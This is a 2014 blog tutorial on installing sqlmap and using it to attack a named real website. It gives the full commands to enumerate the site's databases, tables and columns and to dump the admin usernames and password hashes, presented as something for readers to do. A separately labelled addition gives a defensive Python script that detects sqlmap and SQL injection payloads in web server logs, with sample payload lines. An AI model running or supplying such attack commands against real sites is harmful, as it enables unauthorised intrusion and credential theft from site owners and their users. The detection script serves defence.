2014-02-06

SQLmap installation

Greetings to all, brothers _/\_
Today we will learn how to use sqlmap on a Linux system where it isn't already installed.
On penetration-testing Linux distributions like BackTrack, BackBox and Blackbuntu, sqlmap comes preinstalled,
but you can easily use sqlmap on other systems too :)

How? OK, follow these steps, it's really not a big deal ;)

The official sqlmap website, where you can download the sqlmap source code:
http://sqlmap.org/

Download link:
https://github.com/sqlmapproject/sqlmap/zipball/master


The sqlmap source code is saved under the name master.
It is a zip file; to extract its contents, run the command unzip master.
You will get a directory named sqlmap project or something like that; enter that directory and list the files.


Yes :) Here is our sqlmap source code.
sqlmap is written in Python, and sqlmap.py is the main file used for performing SQL injection.
So let's start >:D<
You can run sqlmap.py in 2 ways, either using python or using ./ ;)
python sqlmap.py option
./sqlmap.py option
If the sqlmap.py file has execute permission, you can run sqlmap using ./
To list the options available for sqlmap, supply the -h option,
like this:
./sqlmap.py -h
Here is the link where you can find the options:
https://github.com/sqlmapproject/sqlmap/wiki/Usage

For example, I want to extract the databases of a website vulnerable to SQL injection using sqlmap.
The website link is http://www.iapex.com.pk/messages.php?id=4
The command will be
./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   --dbs
Here -u specifies the URL that is vulnerable to SQL injection,
and --dbs stands for databases  \ ^_^ /
When you run this command, sqlmap will start injecting this URL and will extract the database names.


After the process completes, you will get results like this:


Now, if you want to get the list of tables in a database, you will need to specify the database name:
./sqlmap.py  -u website.com/vulnerable.php?id=4   -D database_name --tables
In my case I am going for the database named iapexcom_new,

so the command will be
./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   -D iapexcom_new --tables
Here -D specifies the database that is to be enumerated.
We have 2 databases, and we can enumerate tables from these databases.
In the above command we are enumerating the table list of the database iapexcom_new.


After the process completes, sqlmap will show the list of tables in the database.


and so on :)

As we know,
a database has tables and every table has columns.
Columns contain the information/data.
So when performing SQL injection with sqlmap, first we extract the database names, then the list of tables from a database.
After extracting the table names, we select a table and extract the list of columns in that table,
and then we can get the information stored in those columns.
Let's extract the columns from a table of the database ;)
I am going for the table es_admin because this table contains the columns in which the username and password of the website admin are stored :P
./sqlmap.py  -u website.com/vulnerable.php?id=4   -D database_name -T table_name --columns
OK,
the query will be

./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   -D iapexcom_new -T es_admin --columns

The meaning of this command is:
inject the website URL (-u) http://www.iapex.com.pk/messages.php?id=4, whose database name (-D) is iapexcom_new and whose table name (-T) is es_admin, and extract the names of the columns from that table.


Wait a few minutes until sqlmap extracts the column names from the table es_admin.
It will show a result like this:


OK, now we have the column names too, so let's go and extract the data stored in these columns :P
The command will be
./sqlmap.py  -u website.com/vulnerable.php?id=4   -D database_name -T table_name -C column_name --dump

The command in my case:
./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   -D iapexcom_new -T es_admin -C username,password  --dump


After the process completes, you will get a result like this:


You are done >:D<, and you can see the username and password hash which are stored in the table 'es_admin' in the columns named username and password.

This is how you can use sqlmap on a Linux OS where it is not already installed :)
Enjoy

Thank you :)
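
Seen from the server side, the --dbs, --tables, --columns and --dump steps above show up as repeated requests against the same id parameter in the web server's access log. The Python script below is an added example, not part of the original post or of the sqlmap project: it flags clients whose requests carry a User-Agent containing "sqlmap" or SQL injection keywords in the query string. It assumes Apache combined log format; the log lines, IP addresses, regexes and the function name find_sqli_sources are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [06/Feb/2014:10:00:01 +0000] "GET /messages.php?id=4 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [06/Feb/2014:10:00:02 +0000] "GET /messages.php?id=4%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.9 - - [06/Feb/2014:10:00:03 +0000] "GET /messages.php?id=4%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
198.51.100.9 - - [06/Feb/2014:10:00:04 +0000] "GET /messages.php?id=4%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables)>0 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
192.0.2.15 - - [06/Feb/2014:10:00:05 +0000] "GET /messages.php?id=7 HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

# client IP, request target, User-Agent
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Keywords that should never appear in a numeric id parameter (illustrative, not exhaustive).
SQLI_RE = re.compile(
    r"\b(union\s+(all\s+)?select|information_schema|sleep\s*\(|benchmark\s*\(|and\s+\d+\s*=\s*\d+)",
    re.IGNORECASE)


def find_sqli_sources(log_text, min_hits=2):
    """Return {client_ip: [reasons]} for clients with at least min_hits indicators."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, target, agent = m.groups()
        # Decode %xx and '+' so encoded payloads are matched as plain text.
        query = unquote_plus(target.partition("?")[2])
        # The User-Agent is client-controlled, so it is only one indicator;
        # the payload check below does not depend on it.
        if "sqlmap" in agent.lower():
            hits[ip].append("user-agent")
        if SQLI_RE.search(query):
            hits[ip].append("payload")
    return {ip: reasons for ip, reasons in hits.items() if len(reasons) >= min_hits}


if __name__ == "__main__":
    for ip, reasons in find_sqli_sources(SAMPLE_LOG).items():
        print(ip, reasons)
```
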

Greetz to :- Guru ji Zero , code breaker ica, Aasim shaikh,Reborn, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya,L0rd Crus4d3r,Hackuin ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell Hardeep bhai,Mannu,Viki and AR AR bhai ji <3


© 2009 Start With Linux | Mannu Linux